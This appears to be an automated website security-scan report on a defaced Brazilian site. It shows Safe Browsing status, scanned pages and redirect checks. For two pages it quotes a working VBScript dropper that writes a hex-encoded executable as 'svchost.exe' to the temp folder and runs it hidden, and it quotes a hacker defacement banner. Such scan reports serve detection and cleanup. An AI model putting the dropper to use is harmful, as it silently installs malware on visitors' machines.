Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=andreamaral.com.br
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://andreamaral.com.br/ | 200 OK Content-Length: 129213 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Deface/Content modification. The following signature was found: HaCkeD By Killer~X ...[495 bytes skipped]... me, 0 0 5px #ff2d95, 0 0 5px #ff2d95;} #owned{background-color:;position:fixed;bottom:10px;font-size:12px;color:#6633CC;left:10px;padding:0px 0; clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight); _left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} --></style> <title>HaCkeD By Killer~X </title> <meta content="Hacked by Killer~X" name="subject"> <meta content="Hacked by Killer~X" name="Abstract"> <meta name="keywords" content="تم الاختراق من قبل جنرال السعود¡ ...[131629 bytes skipped]... | ||
http://andreamaral.com.br/test404page.js | 200 OK Content-Length: 129213 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: andreamaral.com.br
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Mar 2015 21:00:15 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: andreamaral.com.br
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Mar 2015 21:00:15 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: andreamaral.com.br
Referer: http://www.google.com/search?q=andreamaral.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: andreamaral.com.br
Referer: http://www.google.com/search?q=andreamaral.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.